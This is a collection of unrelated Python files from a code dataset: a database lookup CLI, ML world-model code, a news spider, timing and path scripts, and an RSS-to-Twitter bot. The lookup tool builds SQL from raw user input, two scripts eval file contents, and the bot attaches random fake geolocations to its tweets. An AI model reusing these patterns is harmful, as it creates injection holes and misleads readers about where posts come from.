os.getenv('%s_db_pwd' % prefix)\\\n else os.getenv('%s_db_pwd' % 'default')\n\n def __repr__(self):\n # NOTE: the original format string was lost in extraction; '<DBObj %s:%s>' is a reconstruction\n return '<DBObj %s:%s>' % (self.host, self.port)\n\n\nclass WhichDB:\n envlist = []\n envprefix = ['autocand', 'cand']\n headers = ['id', 'name', 'pool', 'schema']\n\n def __init__(self, searchkey):\n for env in self.envprefix:\n self.envlist.append(DBObj(env))\n self.searchkey = searchkey.lower()\n\n def _get_companies_info(self, dbcon):\n '''\n connect to the db using its db info, search table sf_companies and\n return all companies' info; for now, the info contains:\n company_id, company_name and oracle_pool_id\n '''\n sql = '''select\n company_id,\n company_name,\n oracle_pool_id,\n company_schema\n from sf_companies\n where lower(company_id) like 
'%%%s%%';\n ''' % self.searchkey\n\n connection = pyhdb.connect(\n host=dbcon.host, port=dbcon.port,\n user=dbcon.username, password=dbcon.pwd)\n cursor = connection.cursor()\n cursor.execute(sql)\n records = cursor.fetchall()\n connection.close()\n return records\n\n @timer\n def query_all_pool(self):\n data = []\n for dbcon in self.envlist:\n ret = self._get_companies_info(dbcon)\n data.extend(ret)\n return data\n\n def print_search_result(self, data):\n formatter = TabularOutputFormatter(format_name='ascii')\n companys = formatter.format_output(data, self.headers)\n for row in companys:\n print(row)\n\n def is_file_contains_search_key(self, fpath, searchkey):\n '''\n in order to keep the search logic the same as the sql query, read the\n file content and lowercase it before searching.\n '''\n lines = self.get_cached_file_content(fpath)\n if lines:\n for line in lines:\n if searchkey in line.lower():\n return True\n\n return False\n\n def get_cached_file_content(self, fpath):\n with open(fpath, 'r') as file:\n return file.readlines()\n\n\n@click.command()\n@click.argument('searchkey')\ndef main(searchkey):\n \"\"\"\n \\b\n DESCRIPTION\n Show db pool info of the companies you searched.\n SAMPLES\n whichdb htPLTUP11\\n\n show db info containing the key words 'htpltup'.\\n\n \"\"\"\n # Check the cache first; if no records are cached, connect to the db to fetch them.\n fpath = os.path.join(os.getenv('cache_folder'), 'whichdb.txt')\n wdb = WhichDB(searchkey)\n if os.path.exists(fpath) and\\\n wdb.is_file_contains_search_key(fpath, searchkey):\n # print matched in file\n lines = wdb.get_cached_file_content(fpath)\n data = [literal_eval(sub) for sub in lines if searchkey in sub.lower()]\n wdb.print_search_result(data)\n else:\n data = wdb.query_all_pool()\n if data:\n wdb.print_search_result(data)\n # query all companies and cache to file\n wdb.searchkey = ''\n data = wdb.query_all_pool()\n with open(fpath, 'w') as file:\n file.write(\n '\\n'.join(\n \"('%s','%s','%s','%s')\" % tup for tup in data))\n else:\n print('Warning: no such company exists!!!\\n\\\n script has run against [%s] \\\n and no company found.' 
% wdb.envprefix)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hana/whichdb.py","file_name":"whichdb.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550786015","text":"\nfor name in ['mini', 'small', 'medium', 'large', 'extra']:\n time_test = []\n for i in range(1, 5):\n time_test.append([])\n for k in range(1, 4):\n with open('./{name}_out/{name}{i}_{k}.txt'.format(name=name, i=i, k=k), 'r') as f:\n for line in f:\n if 'Time in seconds = ' in line:\n x = eval(line.split(' = ')[1])\n time_test[i - 1].append(x)\n break\n time_test[i - 1].append(sum(time_test[i - 1]) / 3)\n print(time_test)\n for i in range(0, 3):\n with open('results/{name}{i}.txt'.format(name=name, i=i), 'w') as f:\n res = \"\"\n for j in range(0, 4):\n print(i, j)\n res += str(j + 1) + '\\t' + str(time_test[j][i]) + '\\n'\n f.write(res)\n","sub_path":"OpenMP/BlueGene/collect_info.py","file_name":"collect_info.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433085330","text":"# -*- coding: utf-8 -*-\n\n# Detect the runtime environment and locate file paths relative to this file\n\nimport os\nimport platform\nimport sys\n\n__all__ = ['PATH_APP_ROOT', 'PATH_LOG', 'PATH_CONF', 'PATH_DATA', 'DEV_MODE']\n\nPATH_LOG = ''\nPATH_CONF = ''\nPATH_DATA = ''\nDEV_MODE = False\n\n# Remove the Python installation's extension-package paths, so that development/debugging and official releases depend on the same bundled libraries; otherwise a released build may fail to run\nx = []\nfor p in sys.path:\n if p.find('site-packages') != -1 or p.find('dist-packages') != -1:\n x.append(p)\nfor p in x:\n sys.path.remove(p)\n\nPLATFORM = platform.system().lower()\nif PLATFORM not in ['windows', 'linux']:\n sys.exit(1)\n\nBITS = 'x64'\nif '32bit' == platform.architecture()[0]:\n BITS = 'x86'\n\npath_of_this_file = os.path.abspath(os.path.dirname(__file__))\nPATH_APP_ROOT = os.path.abspath(os.path.join(path_of_this_file, '..'))\n\n# If not packaged, this may be a development checkout or a released source tree; check further to tell them apart\nif os.path.exists(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'etc')):\n DEV_MODE = True\nelif os.path.exists(os.path.join(PATH_APP_ROOT, '..', '..', 'etc')):\n DEV_MODE = False\nelse:\n print('invalid installation.\\n')\n sys.exit(1)\n\n\nif DEV_MODE:\n # Development/debugging mode\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-common'))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n _ext_path = os.path.abspath(\n os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-{}'.format(PLATFORM), BITS))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n PATH_LOG = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'log'))\n PATH_CONF = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'etc'))\n PATH_DATA = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'data'))\n\nelse:\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-common'))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-{}'.format(PLATFORM), BITS))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n PATH_LOG = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'log'))\n PATH_CONF = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'etc'))\n PATH_DATA = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 
'data'))\n","sub_path":"server/www/teleport/app/eom_env.py","file_name":"eom_env.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550352233","text":"import scrapy\n\nfrom uavnews.items import UavnewsItem\n\nclass ttaviationSpider(scrapy.Spider):\n name = \"ttaviation\"\n allowed_domains = [\"ttaviation.com\"]\n start_urls = [\n \"http://www.ttaviation.com/h-col-121.html\"\n ]\n\n def parse(self, response):\n for sel in response.xpath('//div[contains(@class, \"J_newsListLine\")]'):\n item = UavnewsItem()\n item['title'] = sel.xpath('.//a//text()').extract()[0]\n item['link'] = \"http://www.ttaviation.com/\" + sel.xpath('.//a/@href').extract()[1] \n item['desc'] = sel.xpath('.//p/text()').extract()[0]\n item['date'] = sel.xpath('.//div[@id=\"verticalStyleYearandMonth\"]/text()').extract()[0] + \"/\"+ sel.xpath('.//div[@id=\"verticalStyleDay\"]/text()').extract()[0]\n item['source'] = 'ttaviation'\n yield item\n","sub_path":"uavnews/spiders/ttaviation_spider.py","file_name":"ttaviation_spider.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"476989085","text":"import tensorflow as tf\nfrom tensorflow.keras.mixed_precision import experimental as prec\n\nimport networks\nimport tools\n\n\nclass WorldModel(tools.Module):\n\n def __init__(self, step, config):\n self._step = step\n self._config = config\n self.encoder = networks.ConvEncoder(\n config.cnn_depth, config.act, config.encoder_kernels)\n self.dynamics = networks.RSSM(\n config.dyn_stoch, config.dyn_deter, config.dyn_hidden,\n config.dyn_input_layers, config.dyn_output_layers,\n config.dyn_rec_depth, config.dyn_shared, config.dyn_discrete,\n config.act, config.dyn_mean_act, config.dyn_std_act,\n config.dyn_temp_post, config.dyn_min_std, config.dyn_cell)\n self.heads = {}\n channels = (1 if config.grayscale else 3)\n shape = config.size + (channels,)\n self.heads['image'] = networks.ConvDecoder(\n config.cnn_depth, config.act, shape, config.decoder_kernels,\n config.decoder_thin)\n if config.pred_discount:\n self.heads['discount'] = networks.DenseHead(\n [], config.discount_layers, config.units, config.act, dist='binary')\n for name in config.grad_heads:\n assert name in self.heads, name\n self._model_opt = tools.Optimizer(\n 'model', config.model_lr, config.opt_eps, config.grad_clip,\n config.weight_decay, opt=config.opt)\n self._scales = dict(\n reward=config.reward_scale, discount=config.discount_scale)\n\n def train(self, data):\n data = self.preprocess(data)\n with tf.GradientTape() as model_tape:\n embed = self.encoder(data)\n post, prior = self.dynamics.observe(embed)\n kl_balance = tools.schedule(self._config.kl_balance, self._step)\n kl_free = tools.schedule(self._config.kl_free, self._step)\n kl_scale = tools.schedule(self._config.kl_scale, self._step)\n\n kl_loss, kl_value = self.dynamics.kl_loss(\n post, prior, self._config.kl_forward, kl_balance, kl_free, kl_scale)\n losses = {}\n likes = {}\n for name, head in self.heads.items():\n grad_head = (name in self._config.grad_heads)\n feat = self.dynamics.get_feat(post)\n feat = feat if grad_head else tf.stop_gradient(feat)\n pred = head(feat, tf.float32)\n like = pred.log_prob(tf.cast(data[name], tf.float32))\n likes[name] = like\n losses[name] = -tf.reduce_mean(like) * self._scales.get(name, 1.0)\n model_loss = sum(losses.values()) + kl_loss\n model_parts = [self.encoder, 
self.dynamics] + list(self.heads.values())\n metrics = self._model_opt(model_tape, model_loss, model_parts)\n metrics.update({f'{name}_loss': loss for name, loss in losses.items()})\n metrics['kl_balance'] = kl_balance\n metrics['kl_free'] = kl_free\n metrics['kl_scale'] = kl_scale\n metrics['kl'] = tf.reduce_mean(kl_value)\n metrics['prior_ent'] = self.dynamics.get_dist(prior).entropy()\n metrics['post_ent'] = self.dynamics.get_dist(post).entropy()\n context = dict(\n embed=embed, feat=self.dynamics.get_feat(post),\n kl=kl_value, postent=self.dynamics.get_dist(post).entropy())\n return post, context, metrics\n\n @tf.function\n def preprocess(self, obs):\n dtype = prec.global_policy().compute_dtype\n obs = obs.copy()\n obs['image'] = tf.cast(obs['obs'], dtype) / 255.0 - 0.5\n if 'discount' in obs:\n obs['discount'] *= self._config.discount\n for key, value in obs.items():\n if tf.dtypes.as_dtype(value.dtype) in (\n tf.float16, tf.float32, tf.float64):\n obs[key] = tf.cast(value, dtype)\n return obs\n\n @tf.function\n def video_pred(self, data, initial_frames=10, nenvs=6):\n data = self.preprocess(data)\n total_frames = len(data['image'][0])\n truth = data['image'][:nenvs] + 0.5\n embed = self.encoder(data)\n states, _ = self.dynamics.observe(embed[:nenvs, :])\n recon = self.heads['image'](self.dynamics.get_feat(states)).mode()[:nenvs]\n init = {k: v[:, initial_frames-1] for k, v in states.items()}\n prior = self.dynamics.imagine((nenvs, total_frames-initial_frames), init)\n openl = self.heads['image'](self.dynamics.get_feat(prior)).mode()\n model_recon = recon[:, :] + 0.5\n error_recon = (model_recon - truth + 1) / 2\n model_imagine = tf.concat([recon[:, :initial_frames] + 0.5, openl + 0.5], 1)\n error_imagine = (model_imagine - truth + 1) / 2\n return tf.concat([truth, model_imagine, error_imagine], 2), tf.concat([truth, model_recon, error_recon], 2), (truth, model_imagine), (truth, model_recon)\n\n\nclass ConvGRUClassifier(tools.Module):\n def __init__(self, config, world_model, task, n_classes):\n self._config = config\n self._world_model = world_model\n self._task = task\n self._cell_type = config.dyn_classifer_cell\n if config.dyn_classifer_cell == 'gru':\n print(\"Using GRUCell in the Classifier\")\n self._cell = networks.GRUCell(config.dyn_classifer_cell_units, True)\n else:\n print(\"Using No Cell in the Classifier\")\n self._cell = None\n self._classifier = networks.DenseHead(n_classes, config.classifer_layers, config.units, config.act, 'none')\n kw = dict(wd=config.weight_decay, opt=config.opt)\n self._classifer_opt = tools.Optimizer('classifier', config.classifier_lr, config.opt_eps, config.classifier_grad_clip, **kw)\n if self._task == 1 or self._task == 2:\n self._metric = tools.mAP(n_classes, True)\n else:\n self._metric = tf.keras.metrics.TopKCategoricalAccuracy(k=5)\n\n def train(self, data, labels):\n '''\n Take in data, tf.shape(n * B, H, W, C), 'labels': tf.shape(B, n_classes))\n B: Batch size, i.e (No. 
of videos)\n n: Chunks\n T: Frames in each chunk\n H, W, C: Height, width, channels\n '''\n with tf.GradientTape() as classifier_tape:\n if self._task == 1 or self._task == 2:\n objective = tf.nn.sigmoid_cross_entropy_with_logits\n else:\n objective = tf.nn.softmax_cross_entropy_with_logits\n data = self.reshape_data(data)\n data = self.agg_feat(data)\n preds = self._classifier(data)\n preds = tf.cast(preds, tf.float32)\n loss = objective(labels, preds)\n loss = tf.math.reduce_mean(loss)\n self._metric.update_state(labels, preds)\n if self._cell is None:\n classifier_parts = [self._classifier]\n else:\n classifier_parts = [self._cell, self._classifier]\n metrics = self._classifer_opt(classifier_tape, loss, classifier_parts)\n classifier_acc = self._metric.result()\n metrics.update({'classifier_loss': loss, 'classifier_metric': classifier_acc})\n self._metric.reset_states()\n return metrics\n\n def reshape_data(self, data):\n '''\n Args:\n data -> tf.shape(n*B, H, W, C)\n Returns:\n data -> tf.shape(n, B, H, W, C)\n '''\n nB = data.shape[0]\n B = self._config.batch_size\n data = tf.reshape(data, [B, nB // B] + list(data.shape[-1:]))\n data = tf.transpose(data, [1, 0] + list(range(2, len(data.shape))))\n return data\n\n def agg_feat(self, post, state=None):\n '''\n Args:\n post -> tf.shape(n, B, H, W, C)\n Returns:\n x -> tf.shape(B, H, W, C)\n '''\n if self._cell is not None:\n if state is None:\n state = self._cell.get_initial_state(None, post.shape[1], post.dtype)\n x = tf.zeros_like(state)\n for post_state in post:\n x, state = self._cell(post_state, [state])\n state = state[0]\n else:\n x = tf.math.reduce_mean(post, 0)\n return x\n\n @tf.function\n def action_pred(self, data):\n data = self._world_model.preprocess(data)\n embed = self._world_model.encoder(data)\n states, _ = self._world_model.dynamics.observe(embed)\n chunk_posteriors = self._world_model.dynamics.get_feat(states)[:, -1]\n chunk_posteriors = self.reshape_data(chunk_posteriors)\n chunk_posteriors = self.agg_feat(chunk_posteriors)\n preds = self._classifier(chunk_posteriors)\n return preds\n\n\n# class ImagBehavior(tools.Module):\n\n# def __init__(self, config, world_model, stop_grad_actor=True, reward=None):\n# self._config = config\n# self._world_model = world_model\n# self._stop_grad_actor = stop_grad_actor\n# self._reward = reward\n# self.actor = networks.ActionHead(\n# config.num_actions, config.actor_layers, config.units, config.act,\n# config.actor_dist, config.actor_init_std, config.actor_min_std,\n# config.actor_dist, config.actor_temp, config.actor_outscale)\n# self.value = networks.DenseHead(\n# [], config.value_layers, config.units, config.act,\n# config.value_head)\n# if config.slow_value_target or config.slow_actor_target:\n# self._slow_value = networks.DenseHead(\n# [], config.value_layers, config.units, config.act)\n# self._updates = tf.Variable(0, tf.int64)\n# kw = dict(wd=config.weight_decay, opt=config.opt)\n# self._actor_opt = tools.Optimizer(\n# 'actor', config.actor_lr, config.opt_eps, config.actor_grad_clip, **kw)\n# self._value_opt = tools.Optimizer(\n# 'value', config.value_lr, config.opt_eps, config.value_grad_clip, **kw)\n\n# def train(\n# self, start, objective=None, imagine=None, tape=None, repeats=None):\n# objective = objective or self._reward\n# self._update_slow_target()\n# metrics = {}\n# with (tape or tf.GradientTape()) as actor_tape:\n# assert bool(objective) != bool(imagine)\n# if objective:\n# imag_feat, imag_state, imag_action = self._imagine(\n# start, self.actor, 
self._config.imag_horizon, repeats)\n# reward = objective(imag_feat, imag_state, imag_action)\n# else:\n# imag_feat, imag_state, imag_action, reward = imagine(start)\n# actor_ent = self.actor(imag_feat, tf.float32).entropy()\n# state_ent = self._world_model.dynamics.get_dist(\n# imag_state, tf.float32).entropy()\n# target, weights = self._compute_target(\n# imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# self._config.slow_actor_target)\n# actor_loss, mets = self._compute_actor_loss(\n# imag_feat, imag_state, imag_action, target, actor_ent, state_ent,\n# weights)\n# metrics.update(mets)\n# if self._config.slow_value_target != self._config.slow_actor_target:\n# target, weights = self._compute_target(\n# imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# self._config.slow_value_target)\n# value_input = imag_feat\n# with tf.GradientTape() as value_tape:\n# value = self.value(value_input, tf.float32)[:-1]\n# value_loss = -value.log_prob(tf.stop_gradient(target))\n# if self._config.value_decay:\n# value_loss += self._config.value_decay * value.mode()\n# value_loss = tf.reduce_mean(weights[:-1] * value_loss)\n# metrics['reward_mean'] = tf.reduce_mean(reward)\n# metrics['reward_std'] = tf.math.reduce_std(reward)\n# metrics['actor_ent'] = tf.reduce_mean(actor_ent)\n# metrics.update(self._actor_opt(actor_tape, actor_loss, [self.actor]))\n# metrics.update(self._value_opt(value_tape, value_loss, [self.value]))\n# return imag_feat, imag_state, imag_action, weights, metrics\n\n# def _imagine(self, start, policy, horizon, repeats=None):\n# dynamics = self._world_model.dynamics\n# if repeats:\n# start = {k: tf.repeat(v, repeats, axis=1) for k, v in start.items()}\n# flatten = lambda x: tf.reshape(x, [-1] + list(x.shape[2:]))\n# start = {k: flatten(v) for k, v in start.items()}\n# def step(prev, _):\n# state, _, _ = prev\n# feat = dynamics.get_feat(state)\n# inp = tf.stop_gradient(feat) if self._stop_grad_actor else feat\n# action = policy(inp).sample()\n# succ = dynamics.img_step(state, action, sample=self._config.imag_sample)\n# return succ, feat, action\n# feat = 0 * dynamics.get_feat(start)\n# action = policy(feat).mode()\n# succ, feats, actions = tools.static_scan(\n# step, tf.range(horizon), (start, feat, action))\n# states = {k: tf.concat([\n# start[k][None], v[:-1]], 0) for k, v in succ.items()}\n# if repeats:\n# def unfold(tensor):\n# s = tensor.shape\n# return tf.reshape(tensor, [s[0], s[1] // repeats, repeats] + s[2:])\n# states, feats, actions = tf.nest.map_structure(\n# unfold, (states, feats, actions))\n# return feats, states, actions\n\n# def _compute_target(\n# self, imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# slow):\n# reward = tf.cast(reward, tf.float32)\n# if 'discount' in self._world_model.heads:\n# inp = self._world_model.dynamics.get_feat(imag_state)\n# discount = self._world_model.heads['discount'](inp, tf.float32).mean()\n# else:\n# discount = self._config.discount * tf.ones_like(reward)\n# if self._config.future_entropy and tf.greater(\n# self._config.actor_entropy(), 0):\n# reward += self._config.actor_entropy() * actor_ent\n# if self._config.future_entropy and tf.greater(\n# self._config.actor_state_entropy(), 0):\n# reward += self._config.actor_state_entropy() * state_ent\n# if slow:\n# value = self._slow_value(imag_feat, tf.float32).mode()\n# else:\n# value = self.value(imag_feat, tf.float32).mode()\n# target = tools.lambda_return(\n# reward[:-1], value[:-1], discount[:-1],\n# bootstrap=value[-1], 
lambda_=self._config.discount_lambda, axis=0)\n# weights = tf.stop_gradient(tf.math.cumprod(tf.concat(\n# [tf.ones_like(discount[:1]), discount[:-1]], 0), 0))\n# return target, weights\n\n# def _compute_actor_loss(\n# self, imag_feat, imag_state, imag_action, target, actor_ent, state_ent,\n# weights):\n# metrics = {}\n# inp = tf.stop_gradient(imag_feat) if self._stop_grad_actor else imag_feat\n# policy = self.actor(inp, tf.float32)\n# actor_ent = policy.entropy()\n# if self._config.imag_gradient == 'dynamics':\n# actor_target = target\n# elif self._config.imag_gradient == 'reinforce':\n# imag_action = tf.cast(imag_action, tf.float32)\n# actor_target = policy.log_prob(imag_action)[:-1] * tf.stop_gradient(\n# target - self.value(imag_feat[:-1], tf.float32).mode())\n# elif self._config.imag_gradient == 'both':\n# imag_action = tf.cast(imag_action, tf.float32)\n# actor_target = policy.log_prob(imag_action)[:-1] * tf.stop_gradient(\n# target - self.value(imag_feat[:-1], tf.float32).mode())\n# mix = self._config.imag_gradient_mix()\n# actor_target = mix * target + (1 - mix) * actor_target\n# metrics['imag_gradient_mix'] = mix\n# else:\n# raise NotImplementedError(self._config.imag_gradient)\n# if not self._config.future_entropy and tf.greater(\n# self._config.actor_entropy(), 0):\n# actor_target += self._config.actor_entropy() * actor_ent[:-1]\n# if not self._config.future_entropy and tf.greater(\n# self._config.actor_state_entropy(), 0):\n# actor_target += self._config.actor_state_entropy() * state_ent[:-1]\n# actor_loss = -tf.reduce_mean(weights[:-1] * actor_target)\n# return actor_loss, metrics\n\n# def _update_slow_target(self):\n# if self._config.slow_value_target or self._config.slow_actor_target:\n# if self._updates % self._config.slow_target_update == 0:\n# mix = self._config.slow_target_fraction\n# for s, d in zip(self.value.variables, self._slow_value.variables):\n# d.assign(mix * s + (1 - mix) * d)\n# self._updates.assign_add(1)\n","sub_path":"dreamerv2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166257996","text":"import math\n\nA,B,H,M = list(map(float,input().split()))\n\nhm = H + M / 60\nh = hm * 30\nm = M * 6\n\nsa = abs(h - m)\nans = (A**2 + B**2 - A * B * math.cos(math.radians(sa)) * 2) ** 0.5\n\n\n# if int(sa) == 0:\n# if int(h) == int(m):\n# ans = abs(A - B)\n# else:\n# ans = A + B\n\nprint(ans)","sub_path":"python/ABC168/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150990126","text":"import sys\n\n\n\ndef main():\n args = sys.argv\n with open(args[1]) as f:\n lines = f.readlines()\n sumlst = 0 \n for line in lines:\n sumlst += int(line)\n print(sumlst)\n\nif __name__=='__main__':\n main()","sub_path":"week02/sum_numbers.py","file_name":"sum_numbers.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"411591280","text":"#!/usr/bin/python3\nimport feedparser\nimport csv\nimport sys\nimport os\nimport random\nimport tweepy\nimport re\nimport urllib.request\nimport datetime\nimport time\n\n\n#### GET CURRENT FULL PATH TO DIRECTORY\ndef pwdDir ():\n dir_path = os.path.dirname(os.path.realpath(__file__))\n return dir_path\n\n#### GET CREDS AND CREATE LIST.\ndef getCreds():\n credList = []\n with 
open(str('{}/mycreds.csv'.format(pwdDir())), 'r') as credsRaw:\n credsData = csv.reader(credsRaw, delimiter=\",\")\n for item in credsData:\n credList.append(item)\n return credList\n\n\n#### OPEN LIST OF RSS FEEDS AND RANDOMLY PICK ONE TO PUBLISH. \ndef feedToPost():\n feedList = []\n with open(str(\"{}/feeds.csv\".format(pwdDir())), \"r\") as rawRSSfeeds:\n feedsData = csv.reader(rawRSSfeeds)\n for feedRow in feedsData:\n feedURL = feedRow[0]\n feedHashes = feedRow[1]\n feedList.append([feedURL,feedHashes])\n randomListReturn = (random.randint(0,len(feedList)-1))\n return (feedList[randomListReturn])\n\n\n#### CLEAN UP SERIAL NUMBER FOR TRACKING\ndef charcterCleaner(dataString):\n dataString = re.sub('[^A-Za-z0-9]+', '', str(dataString))\n dataString = str(dataString).upper()\n return dataString\n\n#### BUILD A TINY URL TO PUSH \ndef tinyUrl(url):\n apiurl = \"http://tinyurl.com/api-create.php?url=\"\n tinyurl = urllib.request.urlopen(apiurl + url).read()\n return tinyurl.decode(\"utf-8\")\n\n#### TWITTER API INTERFACE, ADD YOUR KEYS AND TOKENS\ndef tweetPusher(tweetString):\n # Consumer keys and access tokens, used for OAuth\n creds = getCreds()\n consumer_key = creds[0][0]\n consumer_secret = creds[0][1]\n access_token = creds[0][2]\n access_token_secret = creds[0][3]\n\n # OAuth process, using the keys and tokens\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n # Creation of the actual interface, using authentication\n api = tweepy.API(auth)\n # Sample method, used to update a status\n # api.update_status(status = tweetString)\n geos = [[37.427621,-122.161944], [37.793372,-122.39711], [37.334308,-121.890445], [38.897691,-77.036488],\n [38.889804,-77.009185], [40.762374,-73.973912],[37.3323,-121.8897], [37.22215,-121.98388], [37.79457,-122.400264],\n [47.603017,-122.33872]]\n cords = random.choice(geos)\n latitude = cords[0]\n longitude = cords[1]\n api.update_status(status=tweetString, lat=latitude, long=longitude)\n\n\n#### RETURN LIST OF POSTS ALREADY MADE\ndef logToRead():\n logList = []\n with open(str('{}/logFile.csv'.format(pwdDir())), \"r\") as rawRSSlogs:\n logsData = csv.reader(rawRSSlogs)\n for logRow in logsData:\n logURL = logRow[0]\n logList.append(logURL)\n logList = sorted(list(set(logList)))\n return logList\n\ndef tweetPoster(tryCounter):\n feedCombo = feedToPost()\n\n logFile = list(logToRead())\n feedURL = feedCombo[0]\n feedHashTags = feedCombo[1]\n feedData = feedparser.parse(feedURL)\n if feedData[ \"bozo\" ] == 0: ## if 0, then it is a good feed.\n # print(feedData[ \"bozo\" ])\n print(feedData[ \"url\" ])\n # print(feedData[ \"channel\" ][ \"title\" ] )\n # print(feedData[ \"channel\" ][ \"description\" ])\n # print(feedData[ \"channel\" ][ \"link\" ])\n for item in feedData[\"items\"]:\n print(\"Attempt {}\".format(tryCounter))\n if tryCounter < 10:\n title = (item[ \"title\" ])\n link = tinyUrl(item[ \"link\" ])\n hashTags = (feedHashTags)\n UID = str(charcterCleaner(str(title + link + hashTags)))[0:50]\n print(UID)\n if UID not in logFile:\n tweetString = (\"\"\"{} {} {}\"\"\".format(title, link, hashTags))\n tweetPusher(tweetString)\n print(\"POSTED TO TWITTER: {}\".format(UID))\n with open(str('{}/logFile.csv'.format(pwdDir())), 'a') as tweetLog:\n tweetLogFile = csv.writer(tweetLog, delimiter=',', quotechar='\"')\n tweetLogFile.writerow([UID])\n tryCounter += 1\n sys.exit()\n None\n else:\n tryCounter += 1\n else:\n sys.exit()\n None\n\n\n\n######################\nif __name__ == 
\"__main__\": \n #### HOUR CLOCK\n startTime = 5 # Start at 5 am\n endTime = 21 # end at 9pm\n\n randomNumber = random.randint(0, 55)\n print (randomNumber)\n if randomNumber <= 35:\n sleepTime = randomNumber * 30\n currentHour = datetime.datetime.now().hour\n print(\"Current Hour: {}\".format(currentHour))\n if currentHour >= startTime and currentHour <= endTime:\n time.sleep(sleepTime)\n tryCounter = 0\n tweetPoster(tryCounter)\n else:\n sys.exit()\n None\n else:\n sys.exit()\n None\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"36591085","text":"import numpy as np\nimport sys\nfilename=sys.argv[1]\nData=np.load(filename)\nX=Data[:,0]\nY=Data[:,1]\ny=lambda a, b : (a*np.sin(X))+b\nQ_obs=Y\nA=[]\nA.append(((max(Q_obs)-min(Q_obs))/2)/2)\nA.append(-((max(Q_obs)-min(Q_obs))/2)/2)\nL=np.matrix([max(Q_obs),min(Q_obs)])\nB=(L.mean())/2\nn=0\ny0_theory=y(A[0],B)\ny1_theory=y(A[1],B)\nbestfit=[]\nfor j in range(2):\n B=(L.mean())/2\n dA=A[j]/2\n dB=B/2\n n=0\n y_theory=y(A[j],B)\n loss=np.sum((y_theory-Q_obs)**2)\n for i in range(10000):\n y_theory1=y(A[j]+dA,B)\n loss1=np.sum((y_theory-Q_obs)**2)\n \n y_theory2=y(A[j],B+dB)\n loss2=np.sum((y_theory2-Q_obs)**2)\n \n y_theory3=y(A[j]+dA,B+dB)\n loss3=np.sum((y_theory3-Q_obs)**2)\n \n INFO=np.matrix([[loss1, loss2, loss3], [A[j]+dA, A[j], A[j]+dA], [B, B+dB, B+dB]])\n MIN_loss=INFO[0].argmin()\n best_loss=INFO[:,MIN_loss]\n \n \n if best_loss[0,0] < loss:\n loss = best_loss[0,0]\n A[j] = best_loss[1,0]\n B = best_loss[2,0]\n else:\n n+=1\n if n > 1:\n dA = dA/5\n dB = dB/5\n n=0\n bestfit.append(loss)\n\nAbest=A[np.matrix(bestfit).argmin()]\nprint('a is: ' + str(Abest))\nprint('b is: ' + str(B))\n","sub_path":"Set4/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"157173873","text":"#-*-coding: utf-8-*-\r\n#Multi-Language coding by Ted Liao\r\nimport re\r\nimport csv\r\nimport glob #取得所有同賦檔名檔案\r\nimport pandas as pd\r\nfrom xml.etree import ElementTree as ET\r\nreference_file = \"Multi-Language.csv\"\r\n\r\n#取得所有ts檔名稱\r\ntsFile = []\r\nfor file in glob.glob('*.ts'):\r\n tsFile.append(file)\r\n \r\n#讀取Multi-Language.csv檔案\r\ntry:\r\n file = pd.read_csv(reference_file,encoding = 'utf-8')\r\n with open(reference_file,'r',newline = '',encoding ='utf-8') as filex:\r\n filereader = csv.reader(filex)\r\n header = next(filereader)\r\n headers = [ n for n in header if n != '' ]\r\n count_header = len(headers)\r\n#確認編碼\r\nexcept UnicodeDecodeError:\r\n print ('\\n請檢查csv檔編碼是否改為UTF-8並再試一次!')\r\n input('請按任意鍵繼續。。。')\r\n \r\n#將csv欄位名稱寫定\r\ncsv_headers = ['German','en-US','Spanish','French','Italian','Japanese','zh-CN','zh-TW']\r\n\r\ncount = 0\r\n#讀取ts檔 XML內容\r\nfor inputFile in tsFile:\r\n try:\r\n with open(inputFile, 'r',encoding ='utf-8') as xml_file:\r\n updateTree = ET.parse(xml_file)\r\n root = updateTree.getroot()\r\n except UnicodeDecodeError:\r\n print 